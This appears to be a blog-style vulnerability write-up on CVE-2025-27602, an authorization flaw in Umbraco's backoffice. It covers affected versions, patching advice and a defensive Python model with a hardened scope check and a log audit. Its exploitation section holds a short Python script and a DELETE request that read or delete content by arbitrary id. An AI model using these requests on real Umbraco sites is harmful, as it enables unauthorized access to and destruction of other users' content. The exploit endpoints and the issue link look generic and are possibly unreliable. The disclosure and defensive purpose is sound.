A critical security flaw was recently disclosed in Umbraco, a popular free and open-source .NET content management system. The vulnerability allows authenticated backoffice users to access or delete content outside the scope of their permissions.
With this post, I'll break down the details of CVE-2025-27602, including the affected versions, steps to exploit the vulnerability, code snippets, and links to the original references. If you're running any versions of Umbraco prior to 10.8.9 or 13.7.1, it's highly recommended to update as there are no known workarounds at this time.
Affected Versions
This vulnerability affects the Umbraco web backoffice in versions prior to 10.8.9 and 13.7.1. Anyone running one of these older versions should update to the patched versions immediately.
Details on Exploitation
CVE-2025-27602 can be exploited by manipulating backoffice API URLs, allowing authenticated backoffice users to access or delete content (or media) held within folders they shouldn't have access to.
Here's a code snippet demonstrating how the vulnerability could be exploited:

    import requests

    def exploit(umbraco_base_url, content_folder_id, user_session):
        # Manipulate the backoffice API URL to include the target folder's id
        api_url = f"{umbraco_base_url}/umbraco/backoffice/UmbracoApi/Content/GetById?id={content_folder_id}"
        # Send a GET request to the manipulated URL with the user's authenticated session cookies
        response = requests.get(api_url, cookies=user_session)
        # If the response is successful, print out the retrieved content
        if response.status_code == 200:
            print(f"Accessed content: {response.content}")
        else:
            print("Failed to access content")
Here is an example of the API URL manipulation to delete a folder:

    DELETE /umbraco/backoffice/UmbracoApi/Content/DeleteById?id={content_folder_id}
By using this malicious API call, the attacker would gain unauthorized access to content or delete content from other users' folders.
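The flaw described above is a missing object-level authorization check: the API authenticates the caller but does not verify that the requested id lies inside that user's permitted content tree. The following is an added example, not code from Umbraco or from this post, that models that class of defect and its fix in Python: a vulnerable lookup gated only on authentication beside a hardened one that walks the node's ancestors and requires one of them to be a start node of the user, plus a log audit that applies the same scope rule to recorded GetById/DeleteById calls so out-of-scope requests can be found after the fact. The content tree, user start nodes and log layout are constructed for illustration; nothing here reflects Umbraco's actual data model or the logic of the linked patch.

```python
import re
from dataclasses import dataclass

# Constructed content tree (not real Umbraco data): id -> (parent_id, name).
# Top-level nodes use parent_id -1.
CONTENT = {
    1000: (-1, "Home"),
    1001: (1000, "Marketing"),
    1002: (1001, "Campaign 2025"),
    2000: (-1, "Finance"),
    2001: (2000, "Q1 Reports"),
}

@dataclass(frozen=True)
class User:
    name: str
    start_node_ids: frozenset  # roots of the subtrees this user may manage

class NotFound(Exception):
    """Requested id does not exist."""

class Forbidden(Exception):
    """Requested id exists but lies outside the caller's scope."""

def ancestors_and_self(tree, node_id):
    """Return [node_id, parent, grandparent, ...]; empty if the id is unknown."""
    path = []
    while node_id in tree:
        path.append(node_id)
        node_id = tree[node_id][0]
    return path

def in_scope(tree, user, node_id):
    """True if the node itself or one of its ancestors is a start node of the user."""
    return any(n in user.start_node_ids for n in ancestors_and_self(tree, node_id))

def get_by_id_vulnerable(tree, user, node_id):
    """Vulnerable pattern: authentication is the only gate, so any backoffice
    user can read any node simply by supplying its id."""
    if node_id not in tree:
        raise NotFound(node_id)
    return tree[node_id][1]

def get_by_id_hardened(tree, user, node_id):
    """Hardened pattern: resolve the node, then require it to lie inside the
    caller's permitted subtree before returning anything."""
    if node_id not in tree:
        raise NotFound(node_id)
    if not in_scope(tree, user, node_id):
        raise Forbidden(f"{user.name} may not access node {node_id}")
    return tree[node_id][1]

def delete_by_id_hardened(tree, user, node_id):
    """The same scope check guards the destructive call. Returns a new tree
    with the node and all of its descendants removed."""
    if node_id not in tree:
        raise NotFound(node_id)
    if not in_scope(tree, user, node_id):
        raise Forbidden(f"{user.name} may not delete node {node_id}")
    return {n: v for n, v in tree.items() if node_id not in ancestors_and_self(tree, n)}

# Constructed access-log lines in a made-up layout (not Umbraco's log format).
SAMPLE_LOG = """\
2025-03-11T16:20:01Z user=alice method=GET path=/umbraco/backoffice/UmbracoApi/Content/GetById?id=1002 status=200
2025-03-11T16:20:07Z user=alice method=GET path=/umbraco/backoffice/UmbracoApi/Content/GetById?id=2001 status=200
2025-03-11T16:20:12Z user=bob method=DELETE path=/umbraco/backoffice/UmbracoApi/Content/DeleteById?id=2001 status=200
2025-03-11T16:20:15Z user=alice method=DELETE path=/umbraco/backoffice/UmbracoApi/Content/DeleteById?id=2000 status=200
"""

LOG_RE = re.compile(
    r"user=(?P<user>\S+) method=\S+ "
    r"path=/umbraco/backoffice/UmbracoApi/Content/(?P<action>GetById|DeleteById)\?id=(?P<id>\d+) "
    r"status=(?P<status>\d+)"
)

def audit_log(log_text, tree, users):
    """Retrospective check: list successful GetById/DeleteById calls whose
    target node lies outside the requesting user's scope."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m or m["status"] != "200" or m["user"] not in users:
            continue
        node_id = int(m["id"])
        if not in_scope(tree, users[m["user"]], node_id):
            findings.append((m["user"], m["action"], node_id))
    return findings

if __name__ == "__main__":
    users = {"alice": User("alice", frozenset({1000})), "bob": User("bob", frozenset({2000}))}
    for finding in audit_log(SAMPLE_LOG, CONTENT, users):
        print("out-of-scope request:", finding)
```

The key design point is that the check runs after the id is resolved and before any data leaves the handler, and that it is shared by every operation on the node (read and delete alike), so a new endpoint cannot accidentally skip it. The audit function is the same rule applied to logs; on a real deployment it would read the web server's access log and the users' actual start nodes rather than the constructed values above.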
The issue was reported and documented on Umbraco's official GitHub repository:
- Issue: https://github.com/umbraco/Umbraco-CMS/issues/27602
- Patch: https://github.com/umbraco/Umbraco-CMS/commit/6dbd25966424df807b134db7b4a645a068aab112
These links contain further details about the vulnerability along with Umbraco's resolution in the form of patched versions 10.8.9 and 13.7.1.
Mitigation
No current workarounds exist for this vulnerability, making it crucial for all Umbraco users to update their installations to either version 10.8.9 or 13.7.1. This will resolve the unauthorized content access and deletion issue in the web backoffice program.
Conclusion
CVE-2025-27602 is a serious vulnerability affecting older versions of Umbraco's web backoffice program. It's crucial for Umbraco users to update their installations to the patched versions (10.8.9 or 13.7.1) to avoid unauthorized content access and deletion by attackers exploiting this flaw. With no existing workarounds, the only recommended solution is to update your software.
Timeline
Published on: 03/11/2025 16:15:18 UTC